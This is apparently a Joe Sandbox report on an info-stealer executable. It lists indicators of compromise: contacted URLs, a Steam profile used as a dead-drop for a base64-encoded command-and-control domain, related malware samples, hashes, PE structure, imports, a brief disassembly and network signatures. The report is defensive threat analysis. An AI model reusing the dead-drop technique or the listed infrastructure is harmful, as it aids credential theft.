                                                                                                                                                                            https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gifOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&ampOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://help.steampowered.com/OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://api.steampowered.com/OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://store.steampowered.com/account/cookiepreferences/OXoeX1Ii3x.exe, 00000000.00000003.1682119129.000000000301E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://https://t.me/asdfghjrrewqqqqtfg/ujs/WorldHellostrwvfncexGostrbrCHbrGkunknownftpac/Up/gltypeOXoeX1Ii3x.exefalse
                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://store.steampowered.com/mobileOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://steamcommunity.com/76561199619938930[1].htm.0.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                                                              high
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.97.3 | llal.xyz | European Union | 13335 | CLOUDFLARENETUS | true
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582973
Start date and time: 2025-01-01 09:06:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 38s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: OXoeX1Ii3x.exe (renamed because the original name is a hash value)
Original Sample Name: 3e9881b9c6ff4994fc9d684456694e77.exe
Detection: MAL
Classification: mal84.troj.winEXE@2/6@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 9
• Number of non-executed functions: 85
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.189.173.22, 20.190.159.68, 4.245.163.56, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
03:07:15 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
188.114.97.3 | RFQ 3100185 MAHAD.exe | malicious | FormBook | www.rgenerousrs.store/o362/
188.114.97.3 | A2028041200SD.exe | malicious | FormBook | www.beylikduzu616161.xyz/2nga/
188.114.97.3 | Delivery_Notification_00000260791.doc.js | malicious | Unknown | radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
188.114.97.3 | ce.vbs | malicious | Unknown | paste.ee/d/lxvbq
188.114.97.3 | Label_00000852555.doc.js | malicious | Unknown | tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
188.114.97.3 | PO 20495088.exe | malicious | FormBook | www.ssrnoremt-rise.sbs/3jsc/
188.114.97.3 | QUOTATION_NOVQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/zWkbOqX7/download
188.114.97.3 | http://kklk16.bsyo45ksda.top | malicious | Unknown | kklk16.bsyo45ksda.top/favicon.ico
188.114.97.3 | gusetup.exe | malicious | Unknown | www.glarysoft.com/update/glary-utilities/pro/pro50/
188.114.97.3 | Online Interview Scheduling Form.lnk | malicious | Ducktail | gmtagency.online/api/check
104.102.49.254 | r4xiHKy8aM.exe | malicious | Socks5Systemz | /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
104.102.49.254 | http://gtm-cn-j4g3qqvf603.steamproxy1.com/ | malicious | Unknown | www.valvesoftware.com/legal.htm
Match | Associated Sample Name / URL | Detection | Threat Name | Context
llal.xyz | 0x001900000002ab40-59.exe | malicious | Arc Stealer | 188.114.97.3
steamcommunity.com | Exlan_setup_v3.1.2.exe | malicious | LummaC | 104.102.49.254
steamcommunity.com | Bootstrapper.exe | malicious | LummaC | 104.102.49.254
steamcommunity.com | GPU-Z.exe | malicious | LummaC, DarkTortilla, LummaC Stealer | 104.102.49.254
steamcommunity.com | gdi32.dll | malicious | LummaC | 23.55.153.106
steamcommunity.com | Loader.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | Crosshair-X.exe | malicious | LummaC | 104.121.10.34
steamcommunity.com | iien1HBbB3.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | oe9KS7ZHUc.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | MPgkx6bQIQ.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | l0zocrLiVW.exe | malicious | LummaC | 23.55.153.106
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | vj0Vxt8xM4.exe | malicious | Unknown | 104.20.99.10
CLOUDFLARENETUS | vj0Vxt8xM4.exe | malicious | Unknown | 104.20.99.10
CLOUDFLARENETUS | dropper.exe | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | 1.ps1 | malicious | Unknown | 172.67.144.62
CLOUDFLARENETUS | https://gogl.to/3HGT | malicious | CAPTCHA Scam ClickFix | 188.114.97.3
CLOUDFLARENETUS | setup.exe | malicious | Unknown | 104.21.30.45
CLOUDFLARENETUS | U1jaLbTw1f.exe | malicious | DCRat, PureLog Stealer, zgRAT | 104.21.38.84
CLOUDFLARENETUS | rename_me_before.exe | malicious | Python Stealer, Exela Stealer | 162.159.128.233
CLOUDFLARENETUS | Loader.exe | malicious | LummaC | 104.21.48.1
CLOUDFLARENETUS | https://thetollroads.com-wfmo.xyz/us | malicious | Unknown | 104.17.25.14
AKAMAI-ASUS | setup.exe | malicious | Unknown | 23.217.49.150
AKAMAI-ASUS | decrypt.exe | malicious | Unknown | 184.28.90.27
AKAMAI-ASUS | decrypt.exe | malicious | Unknown | 184.28.90.27
AKAMAI-ASUS | FW_ Carr & Jeanne Biggerstaff has sent you an ecard.msg | malicious | Unknown | 104.102.34.241
AKAMAI-ASUS | decrypt.ps1 | malicious | Unknown | 184.28.90.27
AKAMAI-ASUS | EdYEXasNiR.exe | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar | 104.102.49.254
AKAMAI-ASUS | Exlan_setup_v3.1.2.exe | malicious | LummaC | 104.102.49.254
AKAMAI-ASUS | https://gogl.to/3HGT | malicious | CAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRAT | 184.28.90.27
AKAMAI-ASUS | Bootstrapper.exe | malicious | LummaC | 104.102.49.254
AKAMAI-ASUS | kwari.arm7.elf | malicious | Mirai | 104.64.19.63
Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e190000000000000000.exe | malicious | Nitol | 188.114.97.3, 104.102.49.254
0000000000000000.exe | malicious | Unknown | 188.114.97.3, 104.102.49.254
1.ps1 | malicious | Unknown | 188.114.97.3, 104.102.49.254
setup.exe | malicious | Unknown | 188.114.97.3, 104.102.49.254
Let's_20Compress.exe | malicious | Unknown | 188.114.97.3, 104.102.49.254
CenteredDealing.exe | malicious | Vidar | 188.114.97.3, 104.102.49.254
CenteredDealing.exe | malicious | Vidar | 188.114.97.3, 104.102.49.254
LinxOptimizer.exe | malicious | Unknown | 188.114.97.3, 104.102.49.254
setup.msi | malicious | Unknown | 188.114.97.3, 104.102.49.254
over.ps1 | malicious | Vidar | 188.114.97.3, 104.102.49.254
No context

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.0176843562603886
Encrypted: false
SSDEEP: 96:cwFfCeQsahqQg7qNHSKQXIDcQsc6j0cEGcw3Zs+HbHg/8BRTf3uEpaYHh4pnD+kH:pAeQ6uq0CH0MnjGnvJzuiFXZ24IO8yH
MD5: 581C4F9C5556B602D68FF66CB3CB4CB0
SHA1: C16826E1550C8FA6FDBD28313BCB63DE9F9D8146
SHA-256: 467AC6DA132C56CBE681C8F6F2CBD1E2B783336F41DFE5216618C36C7399D3F9
SHA-512: 41D60847EC078BAB0C86BFF51B96C8FD54B4499F091AD9060EA5ADF025AE806FCFB3C91E690B3FF9A08E60F95A3CC4288EAF594DCF5844F69EB39B0BC4E33DFC
Malicious: true
Reputation: low
Preview:
  Version=1
  EventType=BEX
  EventTime=133801924190461817
  ReportType=2
  Consent=1
  UploadTime=133801924195149305
  ReportStatus=524384
  ReportIdentifier=807de54d-3fa2-4986-b8e3-16ef5db3b5a3
  IntegratorReportIdentifier=56e12c37-1e60-4b0d-8eec-e8d7c658237d
  Wow64Host=34404
  Wow64Guest=332
  NsAppName=OXoeX1Ii3x.exe
  AppSessionGuid=00001d50-0001-0014-30e4-c21f245cdb01
  TargetAppId=W:0006cc2297b958770841dbf2e5a904515b2700000ffff!0000370244669daea5f87c797d6ad240adbfb7006384!OXoeX1Ii3x.exe
  TargetAppVer=2

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 14 streams, Wed Jan 1 08:06:59 2025, 0x1205a4 type
Category: dropped
Size (bytes): 131032
Entropy (8bit): 1.9068492641388415
Encrypted: false
SSDEEP: 384:787mRbrzeeibJJNSjdRWklBaDbkl1hsQjwFe3pBV+6jIdJGIq3YGFs:4yRJibJJNedckSDb4hxWE7VpzI+Yks
MD5: 08966431692F25B253465EE1757DE3AB
SHA1: B8A12DBECD7693DDCC883E8F60B5B172F0B6BEF7
SHA-256: 1D69A40E8E6F721AC714F128CEFDCD0282BD05F1846F2548930489965068FACD
SHA-512: 75BD462A97C2B07C75A819EDFA10BEA846D5F001364A323E53784B4801381B0E0E75A44079530E860DDA18F7EEC068126F9E98FC110807F41A4499EEB48593EB
Malicious: false
Reputation: low
Preview: MDMP header (binary minidump); readable strings: GenuineIntel, "Eastern Standard Time", "Eastern Summer Time", 19041.1.amd64fre.vb_release.191206-1406; remaining bytes are non-printable

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8378
Entropy (8bit): 3.693935710223083
Encrypted: false
SSDEEP: 192:R6l7wVeJwn/6j6Y9GSUIJLgmfw2pbpDM89bFZsfm3m:R6lXJw6j6Y8SUIJLgmfwQFyfn
MD5: A7838F711EE0041660BC61C07B2FDD03
SHA1: 71D79EC3091F58D475CC28E06AEAABFD3579640D
SHA-256: 4954B066F7C7FDC330BF3E65345B808FCB8E49C510A47104B349767B491CD570
SHA-512: 038836E34942B65612D2216E3A9E92164A2ACB67D8F660221E2A6ED6F6C5E78A53EDF63733BCA53C3BFCAAC60D5E8A4FCEBE9E2457F4361361B29B88B6034B31
Malicious: false
Reputation: low
Preview:
  <?xml version="1.0" encoding="UTF-16"?>
  <WERReportMetadata>
    <OSVersionInformation>
      <WindowsNTVersion>10.0</WindowsNTVersion>
      <Build>19045</Build>
      <Product>(0x30): Windows 10 Pro</Product>
      <Edition>Professional</Edition>
      <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
      <Revision>2006</Revision>
      <Flavor>Multiprocessor Free</Flavor>
      <Architecture>X64</Architecture>
      <LCID>2057</LCID>
    </OSVersionInformation>
    <ProcessInformation>
      <Pid>7504</Pi

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4680
Entropy (8bit): 4.457179477019089
Encrypted: false
SSDEEP: 48:cvIwWl8zs9Jg77aI9ajxWpW8VYmYm8M4JArLirnFlM+q8vWrLirExm1o3pd:uIjfXI78jg7VCJArmrEKWrmrExV3pd
MD5: EB6662A3EF7ACBD975D01AE15AF75ABF
SHA1: 6B59DAF035CEF3E1288CCB5B92DCB61309AF22E8
SHA-256: B9241CFA15F20B88B84E6553786AAAE18C966F911CC118EB7DF4081968E720AC
SHA-512: 356690F6E8F8DB3D7E318AB3A249700D4A856CC7715F2156D60A5E8B563E4D5FD7C0A0714143FC3A75C37BC41AA02A83E5B47536B9D4F242F115380CC99A560B
Malicious: false
Reputation: low
Preview:
  <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
  <req ver="2">
   <tlm>
   <src>
   <desc>
   <mach>
   <os>
   <arg nm="vermaj" val="10" />
   <arg nm="vermin" val="0" />
   <arg nm="verbld" val="19045" />
   <arg nm="vercsdbld" val="2006" />
   <arg nm="verqfe" val="2006" />
   <arg nm="csdbld" val="2006" />
   <arg nm="versp" val="0" />
   <arg nm="arch" val="9" />
   <arg nm="lcid" val="2057" />
   <arg nm="geoid" val="223" />
   <arg nm="sku" val="48" />
   <arg nm="domain" val="0" />
   <arg nm="prodsuite" val="256" />
   <arg nm="ntprodtype" val="1" />
   <arg nm="platid" val="2" />
   <arg nm="tmsi" val="656589" />
   <arg nm="osinsty" val="1" />
   <arg nm="iever" val="11.789.19041.0-11.0.1000" />
   <arg nm="portos" val="0" />
   <arg nm="ram" val="409

Process: C:\Users\user\Desktop\OXoeX1Ii3x.exe
File Type: HTML document, Unicode text, UTF-8 text, with very long lines (3188)
Category: dropped
Size (bytes): 35137
Entropy (8bit): 5.372929654931821
Encrypted: false
SSDEEP: 768:7fBpqhYGM4evx83TfwtuXNS3F4aXfsW9l+X9hJYFnzOMD5QBdxaXfsW9l+X9hJYk:DB8hYGM4evx83TfwtuX84aXfsW9l+X9X
MD5: 7CC5524C7757D70583944AFDB16F641D
SHA1: 3AB509C13EB9B3A018A2F7F6BDADA256808E9894
SHA-256: DF0099583496ACE05DF71A8A5F4D84B99078B4C7CF8342A9C536C179558BA136
SHA-512: 93BB0596F0D4C508109831411BFD25C8BB87814B1C4B3DCB88832591329C89012170199C8397D4EDB71781DB938BD07D74411EA937A46BCF0BE94EC7BC14F807
Malicious: false
Reputation: low
Preview: <!DOCTYPE html>.<html class=" responsive" lang="en">.<head>..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">....<meta name="viewport" content="width=device-width,initial-scale=1">...<meta name="theme-color" content="#171a21">...<title>Steam Community :: 3e3 bGxhbC54eXo=4e4</title>..<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">.......<link href="https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=english&amp;_cdn=fastly" rel="stylesheet" type="text/css">.<link href="https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&amp;_cdn=fastly" rel="stylesheet" type="text/css">.<link href="https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=english&amp;_cdn=fastly" rel="stylesheet" type="text/css">.<link href="https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_cdn=fastly" re

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: MS Windows registry file, NT/2000 or above
Category: dropped
Size (bytes): 1835008
Entropy (8bit): 4.465437324370383
Encrypted: false
SSDEEP: 6144:lIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNndwBCswSbp:GXD94+WlLZMM6YFHB+p
MD5: 037415883CB394E77A69360AF35B7851
SHA1: CBA1BDAD3A2A932BB1E92D1C50CD519B155FA3B0
SHA-256: 448E5F193EBDCDA103BC3C7D650AD1C053D75C579548BB039996DF5FAF274DD9
SHA-512: 366F848D6220AB8F4853DD04FD90397804B0736E9EF281CA28BAAA673F7853BDC68755F9E148E5A831A5EC0C409CFC5FF55F867735B8E77672D7A1A42EA22FC7
Malicious: false
Reputation: low
Preview: regf header (binary registry hive); readable string: \AppCompat\Programs\Amcache.hve; remaining bytes are non-printable
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.544491165544845
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:OXoeX1Ii3x.exe
File size:378'368 bytes
MD5:3e9881b9c6ff4994fc9d684456694e77
SHA1:370244669daea5f87c797d6ad240adbfb7006384
SHA256:a35599ceb0a707d21515a6813b699a86ef0bef98fb42b804274640df2cef4879
SHA512:7b9c266baac07d919376931191ec5ba861ea747cce2a080ddfff3d76067c5125b75618d579db55a3458309743cbe12a75aa76feb1a1a9f5397eed9aa87b0a996
SSDEEP:6144:HSD7bIFLWv34AH9i1Bb5bB3JymF5siEy+GFafYJdWFN+VK:2YQLo1BtWmhEIJovsK
TLSH:29849C32B945E432D16202311F5DDBB5AA7DB1700FB218CBB3E45E6DAEB46C09231F66
                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............t...t...t.......t......1t.......t..O....t..O....t..O....t.......t...t...t..~....t..~....t..Rich.t..........PE..L...w.Xf...
Icon Hash:90cececece8e8eb0
Entrypoint:0x41d1a0
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:0x6658D677 [Thu May 30 19:41:43 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:64cf79ceef6f212e81ad5276c01ae859
Instruction
call 00007FE5748B6A75h
jmp 00007FE5748B642Dh
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00446B48h
mov dword ptr [ecx], 00446B40h
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FE5748B659Fh
push 004572E4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FE5748B96E5h
int3
push ebp
mov ebp, esp
and dword ptr [0045A5D8h], 00000000h
sub esp, 24h
or dword ptr [00459084h], 01h
push 0000000Ah
call dword ptr [004460A0h]
test eax, eax
je 00007FE5748B6772h
and dword ptr [ebp-10h], 00000000h
xor eax, eax
push ebx
push esi
push edi
xor ecx, ecx
lea edi, dword ptr [ebp-24h]
push ebx
cpuid
mov esi, ebx
pop ebx
nop
mov dword ptr [edi], eax
mov dword ptr [edi+04h], esi
mov dword ptr [edi+08h], ecx
xor ecx, ecx
mov dword ptr [edi+0Ch], edx
mov eax, dword ptr [ebp-24h]
mov edi, dword ptr [ebp-20h]
mov dword ptr [ebp-0Ch], eax
xor edi, 756E6547h
mov eax, dword ptr [ebp-18h]
xor eax, 49656E69h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr [ebp-1Ch]
xor eax, 6C65746Eh
mov dword ptr [ebp-08h], eax
xor eax, eax
inc eax
push ebx
cpuid
mov esi, ebx
pop ebx
nop
lea ebx, dword ptr [ebp-24h]
mov dword ptr [ebx], eax
mov eax, dword ptr [ebp-04h]
or eax, dword ptr [ebp-08h]
or eax, edi
mov dword ptr [ebx+04h], esi
mov dword ptr [ebx+08h], ecx
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x57f40          0x8c          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x5c000          0x37bc        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x513d0          0x38          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x51310          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x46000          0x1a4         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type                             Entropy             Characteristics
.text   0x1000           0x44a0a       0x44c00   8d7060d73bc148599fa8d6329daec2ed  False     0.5540056818181818  data                                  6.635307481318297   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x46000          0x128da       0x12a00   514b84d1c41bc5ae9a4f2bd0b693bec4  False     0.4049522860738255  data                                  4.9965728381036545  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x59000          0x2248        0x1400    71b16004b0d569191cb890591629e3c2  False     0.1845703125        DOS executable (block device driver)  3.3917146849602275  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc  0x5c000          0x37bc        0x3800    3f1d3462bb72b406a84416993d5de400  False     0.7054268973214286  data                                  6.597143871177635   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL           Import
KERNEL32.dll  MultiByteToWideChar, FindFirstFileA, HeapFree, OutputDebugStringA, FindNextFileA, lstrlenA, FindClose, Sleep, GetTempPathA, HeapAlloc, GetProcessHeap, GetNativeSystemInfo, WriteFile, SetFilePointer, CreateFileA, CloseHandle, ExitProcess, TerminateProcess, WaitForSingleObject, OpenProcess, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, GetCurrentProcessId, WideCharToMultiByte, HeapSize, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, ReadConsoleW, GetFileSizeEx, HeapReAlloc, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, GetStringTypeW, InitializeCriticalSectionEx, GetProcAddress, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, RtlUnwind, RaiseException, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, SetEndOfFile, CreateFileW, GetFileType, ReadFile, GetModuleHandleExW, GetModuleFileNameW, GetStdHandle, GetCommandLineA, GetCommandLineW, SetStdHandle, GetConsoleOutputCP, GetConsoleMode, SetFilePointerEx, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, FlushFileBuffers, WriteConsoleW
USER32.dll    FindWindowA
SHELL32.dll   SHGetFolderPathA
WININET.dll   InternetWriteFile
SHLWAPI.dll   PathMatchSpecA
RstrtMgr.DLL  RmGetList, RmRegisterResources, RmStartSession, RmEndSession
Timestamp                        SID      Signature                                             Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2025-01-01T09:06:58.180719+0100  2803270  ETPRO MALWARE Common Downloader Header Pattern UHCa   2         192.168.2.4  49730        104.102.49.254  443        TCP
2025-01-01T09:06:59.267860+0100  2803270  ETPRO MALWARE Common Downloader Header Pattern UHCa   2         192.168.2.4  49731        188.114.97.3    443        TCP
2025-01-01T09:06:59.267860+0100  2052674  ET MALWARE ACR Stealer CnC Checkin Attempt            1         192.168.2.4  49731        188.114.97.3    443        TCP
Timestamp                           Source Port  Dest Port  Source IP       Dest IP
Jan 1, 2025 09:06:56.998997927 CET  49730        443        192.168.2.4     104.102.49.254
Jan 1, 2025 09:06:56.999038935 CET  443          49730      104.102.49.254  192.168.2.4
Jan 1, 2025 09:06:56.999244928 CET  49730        443        192.168.2.4     104.102.49.254
Jan 1, 2025 09:06:57.017313957 CET  49730        443        192.168.2.4     104.102.49.254
Jan 1, 2025 09:06:57.017324924 CET  443          49730      104.102.49.254  192.168.2.4
Jan 1, 2025 09:06:57.666670084 CET  443          49730      104.102.49.254  192.168.2.4
Jan 1, 2025 09:06:57.666785955 CET  49730        443        192.168.2.4     104.102.49.254
Jan 1, 2025 09:06:57.728427887 CET  49730        443        192.168.2.4     104.102.49.254
Jan 1, 2025 09:06:57.728436947 CET  443          49730      104.102.49.254  192.168.2.4
Jan 1, 2025 09:06:57.728692055 CET  443          49730      104.102.49.254  192.168.2.4
Jan 1, 2025 09:06:57.728775978 CET  49730        443        192.168.2.4     104.102.49.254
Jan 1, 2025 09:06:57.732364893 CET  49730        443        192.168.2.4     104.102.49.254
Jan 1, 2025 09:06:57.779320002 CET  443          49730      104.102.49.254  192.168.2.4
Jan 1, 2025 09:06:58.180728912 CET  443          49730      104.102.49.254  192.168.2.4
Jan 1, 2025 09:06:58.180746078 CET  443          49730      104.102.49.254  192.168.2.4
Jan 1, 2025 09:06:58.180758953 CET  443          49730      104.102.49.254  192.168.2.4
Jan 1, 2025 09:06:58.180788040 CET  49730        443        192.168.2.4     104.102.49.254
Jan 1, 2025 09:06:58.180794001 CET  443          49730      104.102.49.254  192.168.2.4
Jan 1, 2025 09:06:58.180833101 CET  49730        443        192.168.2.4     104.102.49.254
Jan 1, 2025 09:06:58.180860996 CET  49730        443        192.168.2.4     104.102.49.254
Jan 1, 2025 09:06:58.275837898 CET  443          49730      104.102.49.254  192.168.2.4
Jan 1, 2025 09:06:58.275856972 CET  443          49730      104.102.49.254  192.168.2.4
